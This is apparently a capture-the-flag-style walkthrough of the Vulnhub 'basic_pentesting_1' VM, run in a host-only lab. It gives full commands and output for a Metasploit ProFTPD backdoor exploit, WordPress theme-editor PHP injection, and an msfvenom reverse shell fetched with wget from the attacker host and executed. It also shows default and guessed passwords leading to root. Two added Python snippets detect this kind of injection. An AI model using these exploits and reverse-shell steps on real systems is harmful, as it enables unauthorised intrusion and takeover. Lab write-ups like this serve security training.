- # This is a walkthrough of the basic_pentesting_1.ova/csec VM from Vulnhub.
- #
- # It will be structured as follows:
- # 0: Recon
- # 0.0: NMAP results
- # 0.1: Service exploration
- # 0.1.0: HTTP
- # 0.1.1: FTP
- # 1: Exploitation
- # 1.0: FTP
- # 1.0.0: First blood
- # 1.1: HTTP
- # 1.1.0: WordPress admin user
- # 1.1.1: PHP code injection --> shell
- # 2: Privilege Escalation
- # 2.0: User enumeration
- # 2.1: Password guessing for User
- # 2.2: I AM ROOT!
- # 3: Greetz and supporting information
- #
- # 0: Recon
- # After importing the .ova file the VM named csec was added, and
- # networking settings were adjusted to be host-only adaptors for the
- # attacking machine and the system under test. Both systems were
- # assigned DHCP addresses in the 192.168.56.0/24 network. Specifically
- # the attacking machine (wrath) held the address 192.168.56.102, and
- # the system under test held the address 192.168.56.101.
- #
- # 0.0: NMAP results
- sm0key@wrath:~/hax/csec$ nmap -n -A -Pn 192.168.56.101
- Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-18 08:37 EST
- Nmap scan report for 192.168.56.101
- Host is up (0.00050s latency).
- Not shown: 997 closed ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD 1.3.3c
- 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
- | 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
- |_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA)
- 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- |_http-server-header: Apache/2.4.18 (Ubuntu)
- |_http-title: Site doesn't have a title (text/html).
- Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds
- #
- # 0.1: Service exploration
- # 0.1.0: HTTP
- # Since most of my experience (and my preference) is in
- # testing web applications, I chose to begin enumeration
- # and exploration with the service running on port 80.
- # First I simply performed a GET request for / of the
- # application to see what I was working with.
- #
- sm0key@wrath:~/hax/csec$ curl http://192.168.56.101/
- <html><body><h1>It works!</h1>
- <p>This is the default web page for this server.</p>
- <p>The web server software is running but no content has been added, yet.</p>
- </body></html>
- #
- # Well, that was not very useful.
- # I next chose to run dirb against the root of the
- # web application to see what goodies were available.
- #
- sm0key@wrath:~/hax/csec$ dirb http://192.168.56.101/
- -----------------
- DIRB v2.22
- By The Dark Raver
- -----------------
- START_TIME: Wed Jan 17 10:58:03 2018
- URL_BASE: http://192.168.56.101/
- WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
- -----------------
- GENERATED WORDS: 4612
- ---- Scanning URL: http://192.168.56.101/ ----
- + http://192.168.56.101/index.html (CODE:200|SIZE:177)
- ==> DIRECTORY: http://192.168.56.101/secret/
- + http://192.168.56.101/server-status (CODE:403|SIZE:302)
- ---- Entering directory: http://192.168.56.101/secret/ ----
- + http://192.168.56.101/secret/index.php (CODE:301|SIZE:0)
- ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/
- ==> DIRECTORY: http://192.168.56.101/secret/wp-content/
- ==> DIRECTORY: http://192.168.56.101/secret/wp-includes/
- + http://192.168.56.101/secret/xmlrpc.php (CODE:405|SIZE:42)
- ---- Entering directory: http://192.168.56.101/secret/wp-admin/ ----
- + http://192.168.56.101/secret/wp-admin/admin.php (CODE:302|SIZE:0)
- ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/css/
- ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/images/
- ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/includes/
- + http://192.168.56.101/secret/wp-admin/index.php (CODE:302|SIZE:0)
- ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/js/
- ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/maint/
- ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/network/
- ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/user/
- ---- Entering directory: http://192.168.56.101/secret/wp-content/ ----
- + http://192.168.56.101/secret/wp-content/index.php (CODE:200|SIZE:0)
- ==> DIRECTORY: http://192.168.56.101/secret/wp-content/plugins/
- ==> DIRECTORY: http://192.168.56.101/secret/wp-content/themes/
- ---- Entering directory: http://192.168.56.101/secret/wp-includes/ ----
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode '-w' if you want to scan it anyway)
- ---- Entering directory: http://192.168.56.101/secret/wp-admin/css/ ----
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode '-w' if you want to scan it anyway)
- ---- Entering directory: http://192.168.56.101/secret/wp-admin/images/ ----
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode '-w' if you want to scan it anyway)
- ---- Entering directory: http://192.168.56.101/secret/wp-admin/includes/ ----
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode '-w' if you want to scan it anyway)
- ---- Entering directory: http://192.168.56.101/secret/wp-admin/js/ ----
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode '-w' if you want to scan it anyway)
- ---- Entering directory: http://192.168.56.101/secret/wp-admin/maint/ ----
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode '-w' if you want to scan it anyway)
- ---- Entering directory: http://192.168.56.101/secret/wp-admin/network/ ----
- + http://192.168.56.101/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
- + http://192.168.56.101/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
- ---- Entering directory: http://192.168.56.101/secret/wp-admin/user/ ----
- + http://192.168.56.101/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
- + http://192.168.56.101/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
- ---- Entering directory: http://192.168.56.101/secret/wp-content/plugins/ ----
- + http://192.168.56.101/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
- ---- Entering directory: http://192.168.56.101/secret/wp-content/themes/ ----
- + http://192.168.56.101/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
- -----------------
- END_TIME: Wed Jan 17 10:58:34 2018
- DOWNLOADED: 36896 - FOUND: 13
- #
- # Oh look at that! She has a secret, and it
- # appears to be a WordPress application. Now
- # WordPress applications are, in the wild,
- # pretty much ALWAYS vulnerable. I make a
- # note, and decide to move on in exploration.
- #
- # 0.1.1: FTP
- # The next thing that caught my eye was the
- # FTP service.
- # From the NMAP results we have a precise
- # product name and service version, ProFTPD 1.3.3c.
- # The first order of business is to throw that
- # into searchsploit and see what we get.
- #
- sm0key@wrath:~/hax/csec$ searchsploit ProFTPD 1.3.3c
- ---------------------------------------------------------------------------- -----------------------------------
- Exploit Title | Path
- | (/opt/exploit-database/)
- ---------------------------------------------------------------------------- -----------------------------------
- ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | exploits/linux/remote/15662.txt
- ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16921.rb
- ---------------------------------------------------------------------------- -----------------------------------
- #
- # Looks like this version shipped with a backdoor in
- # its source, and there is a Metasploit module that
- # uses it to give us command execution.
- #
- # 1: Exploitation
- # 1.0: FTP
- # 1.0.0: First blood
- # In the name of failing fast and often I chose
- # to attempt the Metasploit module first. In a
- # real environment I would probably not go for
- # Metasploit, as its traffic and payloads carry
- # signatures that IPS/IDS/firewalls identify easily,
- # but this is the lab so #YOLO!!!!
- #
- sm0key@wrath:~/hax/csec$ msfconsole
- Found a database at /home/sm0key/.msf4/db, checking to see if it is started
- Starting database at /home/sm0key/.msf4/db...success
- Metasploit Park, System Security Interface
- Version 4.0.5, Alpha E
- Ready...
- > access security
- access: PERMISSION DENIED.
- > access security grid
- access: PERMISSION DENIED.
- > access main security grid
- access: PERMISSION DENIED....and...
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- =[ metasploit v4.16.32-dev- ]
- + -- --=[ 1726 exploits - 986 auxiliary - 300 post ]
- + -- --=[ 507 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/unix/ftp/proftpd_133c_backdoor
- msf exploit(unix/ftp/proftpd_133c_backdoor) > set RHOST 192.168.56.101
- RHOST => 192.168.56.101
- msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
- payload => cmd/unix/reverse
- msf exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 192.168.56.102
- LHOST => 192.168.56.102
- msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
- [*] Started reverse TCP double handler on 192.168.56.102:4444
- [*] 192.168.56.101:21 - Sending Backdoor Command
- [*] Accepted the first client connection...
- [*] Accepted the second client connection...
- [*] Command: echo nqRYDUkDUJtPBQ4b;
- [*] Writing to socket A
- [*] Writing to socket B
- [*] Reading from sockets...
- [*] Reading from socket A
- [*] A: "nqRYDUkDUJtPBQ4b\r\n"
- [*] Matching...
- [*] B is input...
- [*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:39888) at 2018-01-18 09:40:16 -0500
- id
- uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
- ^C
- Abort session 1? [y/N] y
- [*] 192.168.56.101 - Command shell session 1 closed. Reason: User exit
- msf exploit(unix/ftp/proftpd_133c_backdoor) >
- #
- # Well, she just gave us root right off the
- # hop. I mean, at this point it's game over,
- # but I'm not the kind of dude who likes to
- # win that easily.
- # Let's keep poking this bear and see what
- # else she has to show us.
- #
- # 1.1: HTTP
- # 1.1.0: WordPress admin user
- # Time to take a look at the WordPress side
- # of this picture. To begin we will make a
- # GET request to /secret/wp-admin/admin.php
- #
- sm0key@wrath:~/hax/csec$ curl -v http://192.168.56.101/secret/wp-admin/admin.php
- * Trying 192.168.56.101...
- * TCP_NODELAY set
- * Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
- > GET /secret/wp-admin/admin.php HTTP/1.1
- > Host: 192.168.56.101
- > User-Agent: curl/7.57.0
- > Accept: */*
- >
- < HTTP/1.1 302 Found
- < Date: Thu, 18 Jan 2018 14:45:42 GMT
- < Server: Apache/2.4.18 (Ubuntu)
- < Expires: Wed, 11 Jan 1984 05:00:00 GMT
- < Cache-Control: no-cache, must-revalidate, max-age=0
- < Location: http://vtcsec/secret/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.101%2Fsecret%2Fwp-admin%2Fadmin.php&reauth=1
- < Content-Length: 0
- < Content-Type: text/html; charset=UTF-8
- <
- * Connection #0 to host 192.168.56.101 left intact
- #
- # As you can see she is giving us an HTTP 302
- # asking us to go to a host named 'vtcsec'. On
- # a hunch I tossed a quick line in my hosts
- # file.
- #
- sm0key@wrath:~/hax/csec$ cat /etc/hosts
- 127.0.0.1 localhost
- 192.168.56.101 vtcsec
- #
- # I then pointed my browser back at the admin.php
- # URL above.
- # That gave us a WordPress login page. Now I personally
- # am not capable of seeing a login form without
- # typing admin <tab> admin and seeing what happens.
- # In this case, like many others before, admin/admin
- # worked like a champ. I was greeted with the
- # administrative dashboard of the WordPress app.
- #
- # 1.1.1: PHP code injection --> shell
- #
- # Alright, so we have admin rights on the WordPress
- # app. Since the admin dashboard includes the theme
- # editor, which writes to the theme's PHP files, this
- # means we probably have PHP code injection. This looks
- # like a more fun thing to exploit. At least it will
- # require some work. Let's test the theory that we can
- # use this for code injection. It is important to note
- # that when doing PHP injection like this, the closing
- # PHP tag '?>' is not necessary, and including it will
- # cause unexpected behavior in WordPress.
- #
- # I went to edit 404.php in
- #
- http://vtcsec/secret/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen
- #
- # for the smoke test I chose phpinfo(). I removed
- # all the code from the template, and replaced it
- # with:
- #
- <?php phpinfo();
- #
- # Visiting the modified file at
- #
- http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php
- #
- # did indeed show our phpinfo page as expected.
- # We now have PHP code execution. Now we just
- # need to get a shell from her. I used the below
- # series of payloads to identify what was
- # available, and prepare for my final approach.
- #
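- # From the defender's side, the sequence above (open the theme
- # editor for a template, then request that template directly) is a
- # usable detection signal. The following added Python example, not
- # part of the original paste, correlates those two requests per
- # client IP over constructed Apache access-log lines; the theme path
- # it derives from the file= and theme= parameters assumes the standard
- # WordPress layout visible in the dirb output.

```python
"""Flag WordPress theme-editor use followed by a direct request to the edited
theme file, the sequence shown in this walkthrough. Added example, not part of
the original paste; the log lines below are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Common Log Format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+')

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def editor_target(url):
    """Return the theme file path a theme-editor.php request edits, or None."""
    parts = urlsplit(url)
    if not parts.path.endswith('/wp-admin/theme-editor.php'):
        return None
    qs = parse_qs(parts.query)
    theme = qs.get('theme', [None])[0]
    fname = qs.get('file', [None])[0]
    if not theme or not fname:
        return None
    # Assumption: wp-admin and wp-content sit under the same WordPress root
    root = parts.path[:-len('wp-admin/theme-editor.php')]
    return f"{root}wp-content/themes/{theme}/{fname}"

def find_theme_injections(lines):
    """Return (ip, path) pairs where an IP opened the editor on a theme file
    and later fetched that file directly. Templates are normally only
    included by WordPress, never requested on their own, so this is a strong
    signal that the file was rewritten to run on its own."""
    pending = defaultdict(set)  # ip -> theme files opened in the editor
    hits = []
    for line in lines:
        rec = parse(line)
        if not rec:
            continue
        target = editor_target(rec['url'])
        if target:
            pending[rec['ip']].add(target)
            continue
        path = urlsplit(rec['url']).path
        if path in pending[rec['ip']] and rec['status'] == '200':
            hits.append((rec['ip'], path))
    return hits

# Constructed sample log, modelled on the requests made in this walkthrough
SAMPLE_LOG = [
    '192.168.56.102 - - [18/Jan/2018:10:14:01 -0500] "GET /secret/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen HTTP/1.1" 200 8123',
    '192.168.56.102 - - [18/Jan/2018:10:14:09 -0500] "POST /secret/wp-admin/theme-editor.php HTTP/1.1" 302 0',
    '192.168.56.102 - - [18/Jan/2018:10:14:15 -0500] "GET /secret/wp-content/themes/twentyseventeen/404.php HTTP/1.1" 200 27',
    '192.168.56.50 - - [18/Jan/2018:10:20:00 -0500] "GET /secret/ HTTP/1.1" 200 5120',
]

if __name__ == '__main__':
    for ip, path in find_theme_injections(SAMPLE_LOG):
        print(f"ALERT {ip} edited and then directly fetched {path}")
```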
- Payload:
- <?php echo(`which curl 2>&1`);
- Response:
- ''
- Payload:
- <?php echo(`which wget 2>&1`);
- Response:
- /usr/bin/wget
- Payload:
- <?php echo(`ls -lah 2>&1`);
- Response:
- total 544K
- drwxr-xr-x 5 www-data www-data 4.0K Nov 15 19:14 .
- drwxr-xr-x 5 www-data www-data 4.0K Nov 15 19:14 ..
- -rw-r--r-- 1 www-data www-data 27 Jan 18 10:14 404.php
- -rw-r--r-- 1 www-data www-data 3.3K Nov 1 18:43 README.txt
- -rw-r--r-- 1 www-data www-data 1.8K Nov 1 2016 archive.php
- drwxr-xr-x 5 www-data www-data 4.0K Nov 15 19:14 assets
- -rw-r--r-- 1 www-data www-data 2.3K Dec 16 2016 comments.php
- -rw-r--r-- 1 www-data www-data 1.3K Apr 18 2017 footer.php
- -rw-r--r-- 1 www-data www-data 1.6K Jan 6 2017 front-page.php
- -rw-r--r-- 1 www-data www-data 19K Oct 4 19:53 functions.php
- -rw-r--r-- 1 www-data www-data 1.8K Dec 20 2016 header.php
- drwxr-xr-x 2 www-data www-data 4.0K Nov 15 19:14 inc
- -rw-r--r-- 1 www-data www-data 2.1K Nov 1 2016 index.php
- -rw-r--r-- 1 www-data www-data 965 Oct 23 2016 page.php
- -rw-r--r-- 1 www-data www-data 9.4K Oct 4 19:35 rtl.css
- -rw-r--r-- 1 www-data www-data 356K Oct 20 2016 screenshot.png
- -rw-r--r-- 1 www-data www-data 2.0K Nov 1 2016 search.php
- -rw-r--r-- 1 www-data www-data 948 Dec 16 2016 searchform.php
- -rw-r--r-- 1 www-data www-data 505 Oct 2 18:04 sidebar.php
- -rw-r--r-- 1 www-data www-data 1.6K Dec 16 2016 single.php
- -rw-r--r-- 1 www-data www-data 82K Nov 1 18:43 style.css
- drwxr-xr-x 7 www-data www-data 4.0K Nov 15 19:14 template-parts
- Payload:
- <?php echo(`whoami 2>&1`);
- Response:
- www-data
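- # The ls -lah output above already shows the tell: 404.php is 27
- # bytes and dated today, while the rest of the theme dates from
- # 2016/2017. This added Python example (not from the original paste)
- # scans a theme directory for PHP files that shell out or whose mtime
- # is far newer than the theme's median; the theme tree it scans is
- # constructed in a temp directory so it runs stand-alone.

```python
"""Scan a WordPress theme directory for template files that look like the
injected 404.php in this walkthrough: PHP that shells out, and a modification
time far newer than the rest of the theme. Added example, not from the paste."""
import os
import re
import tempfile
import time
from statistics import median

# Constructs that let PHP run OS commands; backticks are what the walkthrough used.
SHELL_RE = re.compile(r'`[^`]+`|\b(shell_exec|exec|system|passthru|popen|proc_open|eval)\s*\(')

def scan_theme(theme_dir, mtime_gap=30 * 86400):
    """Return a sorted list of (relative path, reasons) for suspicious PHP files."""
    php = []
    for root, _, files in os.walk(theme_dir):
        for f in files:
            if f.endswith('.php'):
                php.append(os.path.join(root, f))
    if not php:
        return []
    mtimes = {p: os.stat(p).st_mtime for p in php}
    baseline = median(mtimes.values())  # typical mtime of the shipped theme files
    findings = []
    for p in php:
        reasons = []
        with open(p, 'r', errors='replace') as fh:
            src = fh.read()
        if SHELL_RE.search(src):
            reasons.append('shell-execution construct')
        if mtimes[p] - baseline > mtime_gap:
            reasons.append('modified long after the rest of the theme')
        if reasons:
            findings.append((os.path.relpath(p, theme_dir), reasons))
    return sorted(findings)

def build_sample_theme():
    """Constructed theme tree: shipped templates dated 2016 plus one fresh backdoor."""
    d = tempfile.mkdtemp()
    old = time.mktime((2016, 11, 1, 0, 0, 0, 0, 0, -1))
    for name in ('index.php', 'header.php', 'footer.php', 'functions.php', 'page.php'):
        p = os.path.join(d, name)
        with open(p, 'w') as fh:
            fh.write("<?php get_header(); ?>\n<p>template</p>\n")
        os.utime(p, (old, old))
    with open(os.path.join(d, '404.php'), 'w') as fh:
        fh.write("<?php echo(`whoami 2>&1`);\n")  # same shape as the walkthrough's payload
    return d

if __name__ == '__main__':
    for path, why in scan_theme(build_sample_theme()):
        print(f"{path}: {', '.join(why)}")
```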
- #
- # Sweet, so at this point we know that we
- # have access to wget, and are in a directory
- # to which we may write. I take a moment to
- # prepare a quick reverse shell.
- #
- sm0key@wrath:~/hax/csec$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 -f elf >myshell
- No platform was selected, choosing Msf::Module::Platform::Linux from the payload
- No Arch selected, selecting Arch: x86 from the payload
- No encoder or badchars specified, outputting raw payload
- Payload size: 123 bytes
- Final size of elf file: 207 bytes
- #
- # Next I launched an instance of SimpleHTTPServer
- # and pulled down my package. Then I changed the
- # permissions, and prepared for execution.
- #
- Server side:
- sm0key@wrath:~/hax/csec$ python -m SimpleHTTPServer 1234
- Serving HTTP on 0.0.0.0 port 1234 ...
- 192.168.56.101 - - [18/Jan/2018 10:27:03] "GET /myshell HTTP/1.1" 200 -
- ^CTraceback (most recent call last):
- File "/usr/lib/python2.7/runpy.py", line 174, in _run_module_as_main
- "__main__", fname, loader, pkg_name)
- File "/usr/lib/python2.7/runpy.py", line 72, in _run_code
- exec code in run_globals
- File "/usr/lib/python2.7/SimpleHTTPServer.py", line 235, in <module>
- test()
- File "/usr/lib/python2.7/SimpleHTTPServer.py", line 231, in test
- BaseHTTPServer.test(HandlerClass, ServerClass)
- File "/usr/lib/python2.7/BaseHTTPServer.py", line 610, in test
- httpd.serve_forever()
- File "/usr/lib/python2.7/SocketServer.py", line 231, in serve_forever
- poll_interval)
- File "/usr/lib/python2.7/SocketServer.py", line 150, in _eintr_retry
- return func(*args)
- KeyboardInterrupt
- Victim side:
- Payload:
- <?php echo(`wget http://192.168.56.102:1234/myshell 2>&1`);
- Response:
- --2018-01-18 10:27:03-- http://192.168.56.102:1234/myshell
- Connecting to 192.168.56.102:1234... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 336 [application/octet-stream]
- Saving to: 'myshell'
- 0K 100% 43.7M=0s
- 2018-01-18 10:27:03 (43.7 MB/s) - 'myshell' saved [336/336]
- Payload:
- <?php echo(`chmod 755 ./myshell && ls -lah ./myshell 2>&1`);
- Response:
- -rwxr-xr-x 1 www-data www-data 336 Jan 18 10:22 ./myshell
- #
- # Alright we have the shell up there and
- # it is ready to execute. Now to spin up
- # metasploit to catch the call back and
- # we should be in.
- #
- Payload:
- <?php echo(`./myshell`);
- Response (caught on the attacking side by the handler below):
- sm0key@wrath:~/hax/csec$ msfconsole
- # cowsay++
- ____________
- < metasploit >
- ------------
- \ ,__,
- \ (oo)____
- (__) )\
- ||--|| *
- =[ metasploit v4.16.32-dev- ]
- + -- --=[ 1726 exploits - 986 auxiliary - 300 post ]
- + -- --=[ 507 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/multi/handler
- msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
- payload => linux/x86/meterpreter/reverse_tcp
- msf exploit(multi/handler) > set LHOST 192.168.56.102
- LHOST => 192.168.56.102
- msf exploit(multi/handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (linux/x86/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LHOST 192.168.56.102 yes The listen address
- LPORT 4444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(multi/handler) > run
- [*] Started reverse TCP handler on 192.168.56.102:4444
- [*] Sending stage (857352 bytes) to 192.168.56.101
- [*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:39970) at 2018-01-18 11:00:07 -0500
- meterpreter > shell
- Process 2153 created.
- Channel 1 created.
- python -c 'import pty; pty.spawn("/bin/bash")'
- #
- # 2: Privilege Escalation
- # 2.0: User enumeration
- #
- www-data@vtcsec:~/html/secret/wp-content/themes/twentyseventeen$ cd /home/
- cd /home/
- www-data@vtcsec:/home$ ls
- ls
- marlinspike
- www-data@vtcsec:/home$
- #
- # Now we have the name of a standard user.
- # Next, just for grins, I decided to try to
- # SSH in as that user with some simple passwords.
- #
- # 2.1: Password guessing for User
- #
- sm0key@wrath:~/hax/csec$ ssh marlinspike@192.168.56.101
- marlinspike@192.168.56.101's password: marlinspike
- Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
- * Documentation: https://help.ubuntu.com
- * Management: https://landscape.canonical.com
- * Support: https://ubuntu.com/advantage
- 19 packages can be updated.
- 19 updates are security updates.
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- marlinspike@vtcsec:~$
- #
- # Looks like the password was just the username.
- # This is not an uncommon thing, and was a
- # lucky guess. Let's see if the user is able
- # to sudo to root.
- #
- marlinspike@vtcsec:~$ sudo su
- [sudo] password for marlinspike: marlinspike
- #
- # 2.2: I AM ROOT!
- # Annnnnnnnd root.
- #
- root@vtcsec:/home/marlinspike# id
- uid=0(root) gid=0(root) groups=0(root)
- root@vtcsec:/home/marlinspike#
- #
- # 3: Greetz and supporting information
- #
- # Greetz to:
- # Josiah Pierce
- # Gh0s7
- # B0n3s
- # Fuz3
- # Thank you boys for giving me a play space!
- #
- # Supporting information:
- # VM location: https://www.vulnhub.com/entry/basic-pentesting-1,216/
- # dirb: https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
- # nmap: https://nmap.org/
- # metasploit: https://www.metasploit.com/
- #
- # That's a wrap. Thanks for the read.
- # Sm0key
- #